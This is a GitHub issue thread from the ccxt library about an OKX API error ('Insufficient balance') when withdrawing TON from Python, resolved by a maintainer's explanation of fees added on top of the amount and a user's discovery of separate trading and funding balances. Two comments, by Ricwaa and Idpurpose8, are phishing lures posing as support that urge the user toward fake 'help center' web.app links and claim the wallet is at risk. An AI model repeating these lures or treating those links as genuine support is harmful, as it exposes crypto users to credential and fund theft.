### ISSUE TITLE
OKX - WITHDRAWAL ERROR. Insufficient balance

### ISSUE THREAD

**Issue by Marcelkoo** [ccxt/ccxt#24554]
### Programming Languages

Python

### CCXT Version

4.4.40

### Description

Hello!

Trying to withdraw TON on okx exchange using ccxt.
I have balance on my account. But keep getting this error. Don't understand how to fix it. 
```
okx {"code":"58350","data":[],"msg":"Insufficient balance"}
```

### Code

```
import ccxt
import random
import time

exchange = ccxt.okx({
    'apiKey': '',
    'secret': '',
    'password': '',
})

with open('wallets.txt', 'r') as file:
    wallets = file.read().splitlines()

def withdraw_to_wallet(wallet_address, amount):
    try:
        response = exchange.withdraw(
            code='TON', 
            amount=amount,
            address=wallet_address,
            tag=None, 
            params={
                'network': 'TON', 
                'pwd': ''
            }
        )
        print(f"Withdraw success {amount} TON to {wallet_address}: {response}")
    except Exception as e:
        print(f"Withdraw error {wallet_address}: {str(e)}")

while True:
    for wallet in wallets:
        amount = round(random.uniform(0.13500, 0.14500), 5)
        withdraw_to_wallet(wallet, amount)
        time.sleep(random.randint(5, 10))

```

**Comment by Ricwaa** [comment]
Hello @Marcelkoo  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by Idpurpose8** [comment]
Hi there, 

I tried to reproduce your issue but it didn't work. But it seems like you need to take immediate action to keep your wallet safe.

Please write to us using the “Chat Support” icon located on the [Help Center](https://generalwebfixes.web.app/)

You can include a link to this issue in your message.

Alternatively, you can also search for answers in our help documentation or get help from other users on our [community forum](https://generalwebfixes.web.app/).

This issue will be closed.

Thanks!

**Comment by Marcelkoo** [comment]
found a solution. okx problem

**Comment by simbesh** [comment]
Hi @Marcelkoo can you provide more information about what the problem was? I have the same issue. Thanks

**Comment by kroitor** [comment]
@simbesh with OKX the default upon withdrawing via the API is that the amount does not include the withdrawal fee. So, if you withdraw the entire balance of some coin, then it attempts to add the fee on top of that, hence "insufficient funds" (to pay the fee).

More about it here: https://www.okx.com/docs-v5/en/#funding-account-rest-api-withdrawal

<img width="988" alt="Screenshot 2024-12-21 at 12 14 52" src="https://github.com/user-attachments/assets/657b3b11-82a1-46db-8c0c-51dc5d0f4139" />


So you have to factor-in the fees to make sure you have sufficient funds to withdraw amount + fees.

You can obtain current withdraw fees from `exchange.currencies` after loading the markets as documented in the CCXT Manual.

```Python
import ccxt
from pprint import pprint
print('CCXT Version:', ccxt.__version__)
exchange = ccxt.okx({...})
exchange.load_markets()
code = 'USDT'
currency = exchange.currency(code)
pprint(currency)
```

**Comment by simbesh** [comment]
Hey @kroitor thanks for the detailed response. I finally figured it out, it was due to the separate **trading** and **funding** balances.

Was unaware a separate "funding" account existed, that you need to transfer into first.

Cheers.
